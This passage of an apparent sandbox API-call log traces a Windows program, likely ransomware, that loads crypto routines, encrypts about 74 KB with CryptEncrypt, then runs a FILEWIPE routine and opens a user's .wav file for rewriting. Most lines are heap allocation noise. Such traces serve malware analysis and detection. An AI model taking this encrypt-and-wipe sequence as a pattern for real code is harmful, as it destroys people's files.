out: hHeap=0x8a0000) returned 1 [0182.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0182.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0182.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0182.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0182.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0182.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0182.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0182.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0182.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0182.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0182.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0182.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0182.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0182.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0182.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0182.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0182.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0182.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0182.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0182.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0182.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0182.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0182.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0182.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0182.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0182.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0182.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0182.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0182.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0182.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0182.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0182.516] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0182.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0182.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0182.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0182.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0182.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0182.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0182.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0182.516] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0182.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0182.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0182.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0182.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0182.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0182.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0182.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0182.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0182.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0182.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0182.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0182.516] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.516] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.516] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.516] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.516] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.516] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.516] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0182.517] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0182.517] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0182.517] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0182.517] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0182.517] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0182.517] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0182.517] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0182.517] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0182.517] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0182.517] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0182.518] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x122b9, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x122c0) returned 1 [0182.518] CharLowerBuffW (in: lpsz="byte[74433]", cchLength=0xb | out: lpsz="byte[74433]") returned 0xb [0182.518] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0182.518] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0182.519] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa712d0*, pdwDataLen=0x87e820*=0x122b9, dwBufLen=0x122c0 | out: pbData=0xa712d0*, pdwDataLen=0x87e820*=0x122c0) returned 1 [0182.519] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0182.519] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0182.519] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0182.529] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0182.529] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0182.529] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0182.529] CryptDestroyKey (hKey=0x90aed8) returned 1 [0182.530] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0182.530] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0182.530] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0182.530] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0182.530] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0182.530] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0182.530] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0182.530] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0182.530] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0182.530] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0182.530] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0182.530] FreeLibrary (hLibModule=0x74f20000) returned 1 [0182.532] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0182.533] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x223d2d0, ftCreationTime.dwHighDateTime=0x1d5da62, ftLastAccessTime.dwLowDateTime=0x2574c2b0, ftLastAccessTime.dwHighDateTime=0x1d5e60d, ftLastWriteTime.dwLowDateTime=0x2574c2b0, ftLastWriteTime.dwHighDateTime=0x1d5e60d, nFileSizeHigh=0x0, nFileSizeLow=0x122b9, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="teBq0VdNSx.wav", cAlternateFileName="TEBQ0V~1.WAV")) returned 0x90ae18 [0182.533] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0182.533] CharLowerBuffW (in: lpsz="byte[74425]", cchLength=0xb | out: lpsz="byte[74425]") returned 0xb [0182.534] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0182.534] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0182.534] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0182.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0182.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0182.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0182.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c2768 [0182.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c2768, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0182.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0182.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0182.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0182.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0182.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0182.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0182.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0182.535] FreeLibrary (hLibModule=0x75c90000) returned 1 [0182.535] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0182.544] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0182.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0182.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0182.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0182.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0182.544] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0182.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0182.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0182.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0182.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd618 [0182.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9bd618, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0182.545] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aj1lagiqtz\\-eybmjwmxhp\\tebq0vdnsx.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0182.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0182.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0182.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0182.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0182.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0182.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0182.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0182.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0182.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0182.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0182.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0182.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0182.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0182.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0182.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0182.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xd0) returned 0x8c0988 [0182.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbdc2d0 | out: hHeap=0x8a0000) returned 1 [0182.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0182.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0182.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0182.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0182.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0182.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0182.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0182.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0182.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0182.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0182.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0182.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0182.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0182.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0182.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0182.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0182.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0182.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0182.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0182.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0182.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0182.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0182.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0182.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0182.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0182.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0182.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0182.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0182.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0182.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0182.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0182.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0182.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0182.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0182.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0182.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0182.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0182.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0182.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0182.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0182.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0182.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0182.547] FreeLibrary (hLibModule=0x75990000) returned 1 [0182.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0182.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0182.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0182.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0182.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0182.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0182.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0182.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0182.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0182.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0182.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0182.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0182.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0182.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0182.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0182.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0182.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0182.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0182.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0182.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0182.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0182.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0182.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 